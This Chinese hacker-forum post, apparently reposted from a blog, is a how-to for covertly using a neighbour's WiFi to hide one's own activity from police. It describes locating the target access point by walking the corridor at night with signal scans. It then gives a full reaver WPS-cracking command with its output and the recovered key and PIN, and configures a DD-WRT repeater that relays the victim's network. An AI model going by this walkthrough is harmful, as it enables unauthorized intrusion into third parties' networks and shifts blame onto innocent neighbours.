0x0000 前言
做我们这一行的,还是安全第一。如何保护自己不被查水表就成了重中之重的关键问题。
保护水表,从身边做起。
随着科技的进步,WIFI已经覆盖了我们的生活。那么,如何才能算是一个好邻居呢?
可惜,世风日下,这种好邻居已经不复存在了。
不过没有关系,我们可以用我们的技术,来帮助他们成为一个合格的“好邻居”。并且,还能让好邻居起到保护自己的作用。
0x0001 地理环境
我家住在一个比较偏僻的小区,我们来看一下图:
总的来说物理位置还是不错的。
小区只有一个入口,如果有人送快递我从窗口就能看见,这样当邻居有快递的时候,自己就可以做好跑路准备了。
接着就来看看我家附近到底被多少WIFI覆盖。
0x0010 确定无线地理位置
为了确定AP的具体地址,我尝试了许多的办法,比如接入GPS然后隐射到GOOGLE EARTH上。但是效果不是很好,因为我们要定位的是精确地址,对于GOOGLE MAP来说,目标太小无法精确定位(顺便请教下还有什么方法能精确定位AP所在的地理位置)。
所以我选择使用手机搜索WIFI,然后以步行的方式来确定目标的物理位置。
把层楼分成7个部分(每户人家作为一个分界),每到一个点就执行一次扫描。
1号位置:
2号位置:
3号位置:
4号位置:
5号位置:
6号位置:
7号位置:
我们可以看见,在1号位置的时候 Protons For Dotan(以下简称PFD)的信号强度是 -82,之后一直递增直到5号位置的时候出现下降。这时候我们就可以大致确定PFD是4号人家所用的WIFI SSID。
这里建议大家在夜深人静的时候进行,因为拿个手机在走廊上徘徊,着实会让人家觉得可疑。万一哪天快递送到邻居家,邻居说是你的快递,那就不好办了。
另外,有环境的朋友可以带笔记本出去扫,这样可以直接看到PWR的变化,麻麻再也不用担心我刷新不出WIFI信号啦!
现在知道了目标在哪之后就可以开始破解对方的无线了。
0x0011 破解无线
我用的工具是BT5 , Alfa AWUS036NH 和一根9 dBi 的增益天线一根。
个人建议大家破解WIFI的时候选购Realtek RTL8187的芯片。破解相当给力,但是在网上的时候不怎么稳定。
打开BT5之后看看网卡是不是已经识别出来了:
使用 aircrack,寻找附近开启wps的路由器:
使用reaver 破解开启wps功能的路由器密码:
01 |
reaver -i mon0 -b 2C:B0:5D:8A:7C:2C -a -S -vv -d2 -t 5 -c 3 |
02 |
Reaver v1.4 WiFi Protected Setup Attack Tool |
03 |
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> |
04 |
[+] Switching mon0 to channel 1 |
05 |
[+] Waiting for beacon from 2C:B0:5D:8A:7C:2C |
06 |
[+] Associated with 2C:B0:5D:8A:7C:2C (ESSID: Protons For Dotans) |
07 |
[+] Trying pin 12345670 |
08 |
[+] Sending EAPOL START request |
09 |
[+] Received identity request |
10 |
[+] Sending identity response |
11 |
[+] Received M1 message |
12 |
[+] Sending M2 message |
13 |
[+] Received M3 message |
14 |
[+] Sending M4 message |
17 |
[+] Trying pin 00005678 |
18 |
[+] Sending EAPOL START request |
19 |
[+] Received identity request |
20 |
[+] Sending identity response |
21 |
[+] Received M1 message |
22 |
[+] Sending M2 message |
23 |
[+] Received M3 message |
24 |
[+] Sending M4 message |
过程是漫长的,结果是令人振奋的:
1 |
2C:B0:5D:8A:7C:2C Protons For Dotans Key is 'dotan6969' and PIN is '27285688'WPA |
0x0100 创建AP跳板
说白了,就是要创建一个AP来中继对方的无线网络。
通常实现无线信号传递有2个办法,一个是基于硬件的无线信号转发器,另一个是基于软件的DD-WRT。
什么是DD-WRT?简单的来说,DD-WRT是一个第三方开始的固件,功能甚是强大。
各位可以去选购一个可以刷成DD-WRT的无线路由来体验一下他的强大之处。支持的型号列表:
http://www.dd-wrt.com/site/support/router-database
接下来就来看看怎么中继信号:
首先连上自己的无线AP,选择基本设置,注意路由器地址不能与目标冲突。
这里我用 192.168.111.1。
然后选择无线-基本设置:
这里无线模式选择-REPEATER,SSID填写对方的SSID,之后添加一个虚拟接口,填写自己的想要的SSID。
然后单击无线安全:
选择对方的加密模式,填写对方的密码。
在虚拟接口上选择自己AP的加密方法和密码。最后保存重启一下就大功告成了。
0x0101 后记
我一开始的思路是:先确定AP位置然后再破解。实践证明,先破解好无线再去定位AP的物理位置来的效率更高些。
因为并不是所以的无线都能被破解的,但是所有的AP都可以被定位出来,只要肯花时间肯花精力。
各位可以先看看家周围有哪些无线可以破解,之后再去定位,可以提高成功率。
另外,我在目标网络的AP上发现了这么一个功能:
这是不是意味着,能在不影响对方的情况下,再一次中继另外一个无线信号?
由于缺乏实验环境,所以没能弄出个究竟,还请各位有能力有环境有设备的基友给我一个答复。 谢谢。
0x0101 最后的最后
论坛规则说下载要收1个JB啊……对于我这种没jb的穷人来说,着实是一笔大数目。
另外由于我是个懒人,不怎么喜欢下载文档看。
所以综上所述,照顾比我还懒的懒人已经照顾和我一样木jb的穷人,我决定还是勤快点把图文都传到了论坛上,请各位多多支持。多多犒劳。
最后在法客即将停休整顿之际,发表拙文一枚。
真心希望能够早日回到大家庭,越祝愿法客能像以前一样繁荣昌盛。
转载请注明:jinglingshu的博客 » 如何找到一个合格的好邻居
